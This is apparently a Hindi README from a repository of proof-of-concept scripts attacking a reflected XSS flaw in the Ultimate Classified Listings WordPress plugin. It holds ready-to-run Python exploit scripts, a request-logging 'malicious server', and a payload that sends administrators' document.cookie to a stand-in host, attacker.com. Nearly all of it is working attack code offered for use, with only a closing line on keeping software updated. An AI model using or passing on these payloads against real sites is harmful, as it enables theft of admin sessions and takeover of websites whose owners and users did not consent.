
Ultimate Classified Listings WordPress प्लगइन में प्रतिबिंबित XSS और क्राफ्टेड पेलोड और लॉगिंग सर्वर के माध्यम से व्यवस्थापक कुकी चोरी का प्रदर्शन करने वाली प्रूफ-ऑफ-कॉन्सेप्ट स्क्रिप्ट।
इस रिपॉजिटरी में विभिन्न वर्डप्रेस प्लगइन्स में खोजी गई विभिन्न कमजोरियों के लिए प्रूफ ऑफ कॉन्सेप्ट (PoC) स्क्रिप्ट्स शामिल हैं। ये स्क्रिप्ट्स दर्शाती हैं कि हमलावर इन कमजोरियों का उपयोग करके दुर्भावनापूर्ण क्रियाएं कैसे कर सकते हैं।
अल्टीमेट क्लासिफाइड लिस्टिंग्स प्लगइन में रिफ्लेक्टेड क्रॉस-साइट स्क्रिप्टिंग (XSS)
XSS का उपयोग करके कुकीज़ चुराना
यह PoC दर्शाता है कि अल्टीमेट क्लासिफाइड लिस्टिंग्स प्लगइन में रिफ्लेक्टेड XSS कमजोरी का उपयोग कैसे किया जाए।
कमजोर पैरामीटर की पहचान करें:
search है, जो URL http://example.com/classifieds में है।एक दुर्भावनापूर्ण URL बनाएं:
http://example.com/classifieds?search=<script>alert('XSS')</script>
PoC स्क्रिप्ट चलाएं:
xss_poc.py के रूप में सेव करें और इसे चलाएं।import requests
# कॉन्फ़िगरेशन
target_url = "http://example.com/classifieds" # इसे लक्ष्य साइट के URL में बदलें
payload = "<script>alert('XSS')</script>" # XSS पेलोड
def trigger_xss():
# दुर्भावनापूर्ण URL बनाएं
malicious_url = f"{target_url}?search={payload}"
# दुर्भावनापूर्ण URL पर GET अनुरोध भेजें
response = requests.get(malicious_url)
# जाँचें कि क्या पेलोड प्रतिक्रिया में प्रतिबिंबित हुआ है
if payload in response.text:
print("[+] XSS पेलोड प्रतिक्रिया में प्रतिबिंबित हुआ।")
print("[+] दुर्भावनापूर्ण URL:", malicious_url)
else:
print("[-] XSS पेलोड प्रतिक्रिया में प्रतिबिंबित नहीं हुआ।")
if __name__ == "__main__":
trigger_xss()
यह PoC दर्शाता है कि कैसे एक हमलावर रिफ्लेक्टेड XSS कमजोरी का उपयोग करके उच्च-विशेषाधिकार वाले उपयोगकर्ताओं से कुकीज़ चुरा सकता है।
एक दुर्भावनापूर्ण सर्वर सेटअप करें:
malicious_server.py के रूप में सेव करें और इसे चलाकर एक सर्वर शुरू करें जो आने वाले अनुरोधों (कुकीज़ सहित) को लॉग करता है।from http.server import BaseHTTPRequestHandler, HTTPServer
import logging
class RequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
logging.info(f"अनुरोध प्राप्त हुआ: {self.headers}")
self.send_response(200)
self.end_headers()
def run(server_class=HTTPServer, handler_class=RequestHandler, port=8080):
logging.basicConfig(filename='server.log', level=logging.INFO)
server_address = ('', port)
httpd = server_class(server_address, handler_class)
logging.info(f'सर्वर पोर्ट {port} पर शुरू हो रहा है...')
httpd.serve_forever()
if __name__ == "__main__":
run()
कुकीज़ चुराने के लिए एक पेलोड तैयार करें:
http://example.com/classifieds?search=<script>new Image().src='http://attacker.com:8080?cookie='+document.cookie;</script>
PoC स्क्रिप्ट चलाएं:
steal_cookies_poc.py के रूप में सेव करें और इसे चलाएं।import requests
# कॉन्फ़िगरेशन
target_url = "http://example.com/classifieds" # इसे लक्ष्य साइट के URL में बदलें
attacker_server = "http://attacker.com:8080" # इसे अपने दुर्भावनापूर्ण सर्वर के URL में बदलें
payload = f"<script>new Image().src='{attacker_server}?cookie='+document.cookie;</script>"
def trigger_xss():
# दुर्भावनापूर्ण URL बनाएं
malicious_url = f"{target_url}?search={payload}"
# दुर्भावनापूर्ण URL पर GET अनुरोध भेजें
response = requests.get(malicious_url)
# जाँचें कि क्या पेलोड प्रतिक्रिया में प्रतिबिंबित हुआ है
if payload in response.text:
print("[+] XSS पेलोड प्रतिक्रिया में प्रतिबिंबित हुआ।")
print("[+] दुर्भावनापूर्ण URL:", malicious_url)
else:
print("[-] XSS पेलोड प्रतिक्रिया में प्रतिबिंबित नहीं हुआ।")
if __name__ == "__main__":
trigger_xss()
ये PoC दर्शाते हैं कि कैसे एक हमलावर वर्डप्रेस प्लगइन्स में कमजोरियों का उपयोग करके दुर्भावनापूर्ण क्रियाएं कर सकता है। हमेशा अपने सॉफ्टवेयर को अपडेट रखें और ऐसी कमजोरियों को रोकने के लिए सुरक्षा सर्वोत्तम प्रथाओं का पालन करें।